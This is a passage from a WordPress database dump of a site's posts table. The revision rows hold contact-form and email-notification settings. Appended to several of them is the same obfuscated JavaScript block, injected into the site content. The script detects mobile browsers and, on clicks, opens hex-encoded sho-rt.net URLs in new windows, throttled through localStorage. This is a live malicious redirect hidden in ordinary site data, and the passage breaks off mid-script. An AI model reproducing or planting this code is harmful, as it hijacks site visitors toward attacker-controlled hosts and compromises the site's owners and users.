_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-08-20 23:46:21','2023-08-20 23:46:21','',5364,'https://gsw2023.com/?p=5366',0,'revision','',0),
(5367,1,'2023-08-22 21:16:21','2023-08-22 21:16:21','{\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"format\":\"first-last\",\"label\":\"Name\",\"required\":\"1\",\"size\":\"medium\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"required\":\"1\",\"size\":\"medium\",\"allowlist\":\"\",\"denylist\":\"\",\"default_value\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"size\":\"medium\",\"placeholder\":\"\",\"css\":\"\"}],\"field_id\":3,\"settings\":{\"form_title\":\"Please Fill Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us<\\/p>\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"form_pages_title\":\"Simple Contact Form\",\"conversational_forms_title\":\"Please Fill Contact Form\",\"form_pages_page_slug\":\"please-fill-contact-form\",\"conversational_forms_page_slug\":\"please-fill-contact-form\"},\"meta\":{\"template\":\"simple-contact-form-template\"},\"id\":\"5345\",\"payments\":[]}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Please Fill Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-22 21:16:21','2023-08-22 21:16:21','',5345,'https://gsw2023.com/?p=5367',0,'revision','',0),
(5368,0,'2015-04-06 17:18:12','2015-04-06 17:18:12','{\"email_to\":\"[admin_email]\",\"cc\":\"\",\"bcc\":\"\",\"reply_to\":\"[3]\",\"from\":\"[sitename] <[admin_email]>\",\"email_subject\":\"\",\"email_message\":\"[default-message]\",\"event\":[\"create\"],\"conditions\":{\"send_stop\":\"send\",\"any_all\":\"any\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 